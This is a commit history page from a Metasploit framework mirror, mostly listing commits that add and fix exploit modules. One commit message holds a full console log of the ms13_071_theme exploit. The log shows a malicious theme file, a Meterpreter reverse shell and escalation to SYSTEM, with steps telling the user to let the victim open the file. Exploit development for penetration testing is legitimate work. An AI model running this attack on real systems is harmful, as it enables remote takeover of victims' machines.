adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
55,054 Commits 27 Branches 1,043 Tags
94de45d856b7d4ea32456bbdc7531af67bfbcaa1
Commit Graph

916 Commits

Author SHA1 Message Date
jvazquez-r7 0e57277dc1 Do cleanup 2015-03-04 10:33:57 -06:00
jvazquez-r7 b9ed8178a9 Solve conflicts on ms13_071_theme 2015-03-04 10:28:52 -06:00
Matthew Hall 4757698c15 Modify primer to utilise file_contents macro. 2015-03-04 09:52:00 +00:00
Matthew Hall e6ecdde451 Modify SMB generation code to use primer based on #3074 changes to 
implement Msf::Exploit::Remote::SMB::Server::Share as a mixin.
 2015-02-20 11:35:22 +00:00
jakxx 44a7e7e4bc publish-it fileformat exploit 2015-02-18 13:22:54 -05:00
jvazquez-r7 0372b08d83 Fix mixin usage on modules 2015-02-13 17:17:59 -06:00
jvazquez-r7 92422c7b9a Save the output file on local_directory 2015-02-12 16:16:21 -06:00
jvazquez-r7 831a1494ac Keep default behavior for modules forcing Msf::Encoder::Type::AlphanumUpper 2015-02-08 18:29:25 -06:00
jvazquez-r7 3e7e9ae99b Keep default behavior for modules forcing Msf::Encoder::Type::AlphanumMixed 2015-02-08 18:22:11 -06:00
sinn3r 9112e70187 Fix #4693 - Uninit Rex::OLE in MS14-064 exploits 
Fix #4693
 2015-02-02 00:20:34 -06:00
Tod Beardsley bae19405a7 Various grammar, spelling, word choice fixes 2015-01-26 11:00:07 -06:00
sinn3r 2ed05869b8 Make Msf::Exploit::PDF follow the Ruby method naming convention 
Just changing method names.

It will actually also fix #4520
 2015-01-06 12:42:06 -06:00
William Vu f2710f6ba7 Land #4443, BulletProof FTP client exploit 2015-01-06 02:10:42 -06:00
William Vu 482cfb8d59 Clean up some stuff 2015-01-06 02:10:25 -06:00
Gabor Seljan 0b85a81b01 Use REXML to generate exploit file 2014-12-24 19:23:28 +01:00
Gabor Seljan 9be95eacb8 Use %Q for double-quoted string 2014-12-22 07:37:32 +01:00
sgabe bb33a91110 Update description to be a little more descriptive 2014-12-21 19:31:58 +01:00
sgabe cd02e61a57 Add module for OSVDB-114279 2014-12-21 17:00:45 +01:00
sgabe 9f97b55a4b Add module for CVE-2014-2973 2014-12-20 18:38:22 +01:00
Christian Mehlmauer 0f27c63720 fix msftidy warnings 2014-12-12 13:16:21 +01:00
Christian Mehlmauer 544f75e7be fix invalid URI scheme, closes #4362 2014-12-11 23:34:10 +01:00
Tod Beardsley dd1920edd6 Minor typos and grammar fixes 2014-11-13 14:48:23 -06:00
jvazquez-r7 31f3aa1f6d Refactor create packager methods 2014-11-13 01:16:15 -06:00
jvazquez-r7 38a96e3cfc Update target info 2014-11-13 00:56:42 -06:00
jvazquez-r7 e25b6145f9 Add module for MS14-064 bypassing UAC through python for windows 2014-11-13 00:56:10 -06:00
jvazquez-r7 c35dc2e6b3 Add module for CVE-2014-6352 2014-11-12 01:10:49 -06:00
sinn3r 1b2554bc0d Add a default template for CVE-2010-1240 PDF exploit 2014-11-05 17:08:38 -06:00
Tod Beardsley 6812b8fa82 Typo and grammar 2014-10-20 11:02:09 -05:00
sinn3r 8b5a33c23f Land #4044 - MS14-060 "Sandworm" 2014-10-17 16:46:32 -05:00
jvazquez-r7 70f8e8d306 Update description 2014-10-17 16:17:00 -05:00
jvazquez-r7 e52241bfe3 Update target info 2014-10-17 16:14:54 -05:00
sinn3r ef1556eb62 Another update 2014-10-17 13:56:37 -05:00
jvazquez-r7 8fa648744c Add @wchen-r7's unc regex 2014-10-17 13:46:13 -05:00
URI Assassin 35d3bbf74d Fix up comment splats with the correct URI 
See the complaint on #4039. This doesn't fix that particular
issue (it's somewhat unrelated), but does solve around
a file parsing problem reported by @void-in
 2014-10-17 11:47:33 -05:00
jvazquez-r7 e5903562ee Delete bad/incomplete validation method 2014-10-17 10:36:01 -05:00
sinn3r a79427a659 I shoulda checked before git commit 2014-10-17 00:54:45 -05:00
sinn3r 4c0048f26a Update description 2014-10-17 00:46:17 -05:00
jvazquez-r7 1d16bd5c77 Fix vulnerability discoverer 2014-10-16 18:01:45 -05:00
jvazquez-r7 807f1e3560 Fix target name 2014-10-16 17:58:45 -05:00
jvazquez-r7 c1f9ccda64 Fix ruby 2014-10-16 17:55:00 -05:00
jvazquez-r7 e40642799e Add sandworm module 2014-10-16 16:37:37 -05:00
William Vu 9f6a40dfd6 Fix bad pack in mswin_tiff_overflow 
Reported by @egyjuzer in #3706.
 2014-08-26 11:14:44 -05:00
jvazquez-r7 b259e5b464 Update description again 2014-08-07 09:21:25 -05:00
jvazquez-r7 4af0eca330 Update target description 2014-08-07 09:11:01 -05:00
William Vu 25f74b79b8 Land #3484, bad pack/unpack specifier fix 2014-07-16 14:52:23 -05:00
jvazquez-r7 8937fbb2f5 Fix email format 2014-07-11 12:45:23 -05:00
HD Moore c9b6c05eab Fix improper use of host-endian or signed pack/unpack 
Note that there are some cases of host-endian left, these
are intentional because they operate on host-local memory
or services.

When in doubt, please use:

```
ri pack
```
 2014-06-30 02:50:10 -05:00
Christian Mehlmauer 8e1949f3c8 Added newline at EOF 2014-06-17 21:03:18 +02:00
Matthew Hall f72d54b9df Refactor ms13_071_theme to utilise Msf::Exploit::Remote::SMBFileServer 
This commit refactors the ms13_071_theme module written by @jvazques-r7
to utilise the Rex SMBFileServer protocol and remove duplicate code from
Metasploit.

```
[*] Processing test3.msf for ERB directives.
resource (test3.msf)> use exploits/windows/fileformat/ms13_071_theme
resource (test3.msf)> set VERBOSE true
VERBOSE => true
resource (test3.msf)> set SHARE share
SHARE => share
resource (test3.msf)> set SCR exploit.scr
SCR => exploit.scr
resource (test3.msf)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (test3.msf)> set LHOST 172.32.255.1
LHOST => 172.32.255.1
resource (test3.msf)> set SRVHOST 172.32.255.1
SRVHOST => 172.32.255.1
resource (test3.msf)> set LPORT 4444
LPORT => 4444
resource (test3.msf)> exploit
[*] Started reverse handler on 172.32.255.1:4444
[*] Generating our malicious executable...
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /root/.msf4/local/msf.theme
[+] Let your victim open msf.theme
[*] Starting SMB Server on: \\172.32.255.1\share\exploit.scr
[*] Starting SMB Server on 172.32.255.1:445
[*] Sending stage (769536 bytes) to 172.32.255.129
[*] Meterpreter session 1 opened (172.32.255.1:4444 -> 172.32.255.129:1096) at 2014-04-30 12:05:46 +0100

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

1. use exploits/windows/fileformat/ms13_071_theme
2. set payload windows/meterpreter/reverse_tcp
3. set LHOST
4. set SRVHOST
5. exploit
6. Copy msf.theme to target
7. Open theme and navigate to "Screensaver" tab
8. Enjoy shells

- [ ] Land #3074
- [ ] Land #3075
- [ ] Run exploits/windows/fileformat/ms13_071_theme
- [ ] Let target open malicious msf.theme file

* Windows XP SP3
 2014-04-30 12:14:58 +01:00
sinn3r b1ac0cbdc7 Land #3239 - Added target 6.1 to module 2014-04-28 18:28:14 -05:00